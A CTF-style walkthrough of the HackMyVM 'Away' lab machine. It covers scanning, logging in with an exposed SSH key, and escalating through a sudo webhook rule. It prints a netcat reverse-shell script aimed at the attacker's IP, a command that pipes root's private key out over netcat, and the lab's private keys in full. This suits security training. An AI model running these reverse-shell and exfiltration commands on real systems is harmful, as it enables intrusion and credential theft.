NOTES ABOUT Away
[ 2022-10-08 ] [ HackMyVM / Away ]Status: Rooted
Skills: Port Scanning, OpenSSH, Sudo, webhook
Tools: nmap, nc, ssh
PORT SCANNING
$ nmap -T4 -sCSV -p- 10.0.2.20
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 f1:87:03:41:21:12:ef:80:3c:8f:07:2f:8b:3c:6e:2a (RSA)
| 256 5f:f9:ca:19:0d:74:65:2c:97:4a:36:a4:04:7c:9b:bd (ECDSA)
|_ 256 39:a4:b3:38:94:c5:d2:77:07:a1:dd:b4:2f:0a:5a:44 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Site doesn\'t have a title (text/html).
|_http-server-header: nginx/1.18.0
GETTING IN
http://10.0.2.20/
Login: tula
+--[ED25519 256]--+
| . . =+. .o.. |
| + +.+ . .o |
| = + + + o |
| + B + o o |
| = S o . |
| = + o . |
| + X o . |
| O O. . . . |
| . E+.. . . |
+----[SHA256]-----+
$ wget http://10.0.2.20/id_ed25519 -O id_ed25519.key
http://10.0.2.20/id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABA+GY+qad
MDkU/yMHam3bmdAAAAEAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIIpBfnwSG2XZXFTs
YR6Gg1apA+kuSgdtTkrrhhgskSJfAAAAsAEbt6fRUQfkYGDCdAa/zOBpiUuAV1kGiDs3F1
gD8y+UxeRdz6gQxbHAY53rE25YN+t1bml5GuNMx99CLApAQCMgeePifFV+t2gRnaMEGRnf
4u1RfM20X6rRYdKeQKHwrE5b/m4xgKC5FvKfiGESqirQ2XPWZnOfbcNc+czsut8t8v+zfl
kYo1mO1M4Va9i+OipgnoOJkdNB+mdx2f7YE0lWoHdt/7KVG5eDB90WrJZF
-----END OPENSSH PRIVATE KEY-----
$ wget http://10.0.2.20/id_ed25519
http://10.0.2.20/id_ed25519.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIpBfnwSG2XZXFTsYR6Gg1apA+kuSgdtTkrrhhgskSJf My passphrase is: Theclockisticking
wget http://10.0.2.20/id_ed25519.pub
SSH CONNECT
ssh tula@10.0.2.20 -i ./id_ed25519
[...]
Permissions 0644 for './id_ed25519' are too open.
[...]
tula@10.0.2.20: Permission denied (publickey).
$ chmod 0400 ./id_ed25519
$ ssh tula@10.0.2.20 -i ./id_ed25519
Enter passphrase for key './id_ed25519': Theclockisticking
tula@away:~$ cat user.txt
ELEVATING PRIVILEGES
tula@away:~$ sudo -l
Matching Defaults entries for tula on away:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User tula may run the following commands on away:
(lula) NOPASSWD: /usr/bin/webhook
tula@away:~$ sudo -u lula /usr/bin/webhook
[webhook] 2022/10/08 19:28:40 "couldn\'t load any hooks from file"!
aborting webhook execution since the -verbose flag is set to false.
If, for some reason, you want webhook to start without the hooks, either use -verbose flag, or -nopanic
tula@away:~$
PAYLOAD: [ automated-actions-webhooks-example-shell-script ]
$ cd /tmp
$ echo '#!/bin/bash' > rs.sh
$ echo '/usr/bin/nc -e /bin/bash 10.0.2.15 80' >> ./rs.sh
$ chmod +x ./rs.sh
$ echo '[{"id": "shell","execute-command": "/tmp/rs.sh"}]' > hook
$ sudo -u lula webhook -verbose -hooks ./hook
[...]
[webhook] 2022/10/08 19:40:01 attempting to load hooks from ./hook
[webhook] 2022/10/08 19:40:01 found 1 hook(s) in file
[webhook] 2022/10/08 19:40:01 loaded: shell
[webhook] 2022/10/08 19:40:01 serving hooks on http://0.0.0.0:9000/hooks/{id}
[...]
NOW LULA FROM REVERSE SHELL
$ find / -xdev -group lula 2>/dev/null
/home/lula
/home/lula/.bash_history
/home/lula/.bashrc
/home/lula/.bash_logout
/home/lula/.profile
/usr/bin/more
$ more /root/ro0t.txt
$ more /root/.ssh/id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACCZsnRA543yhxJSmFw8Nc2vT6umh4rqVRA5RwgKbTm/SAAAAJB3Fxg4dxcY
OAAAAAtzc2gtZWQyNTUxOQAAACCZsnRA543yhxJSmFw8Nc2vT6umh4rqVRA5RwgKbTm/SA
AAAECDZ5NtdbnBm8jUAAdwpKe3m6amsmnVy+AS2qRite6MpZmydEDnjfKHElKYXDw1za9P
q6aHiupVEDlHCAptOb9IAAAACXJvb3RAYXdheQECAwQ=
-----END OPENSSH PRIVATE KEY-----
SEND PRIVATE ROOT KEY VIA REVERSE SHELL.
more /root/.ssh/id_ed25519 > private_root
cat private_root | nc 10.0.2.15 443
$ nc -lvnp 443 > root_private
listening on [any] 443 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.20] 36284
^C
$ chmod 0400 root_private
$ ssh root@10.0.2.20 -i root_private
root@away:~# init 0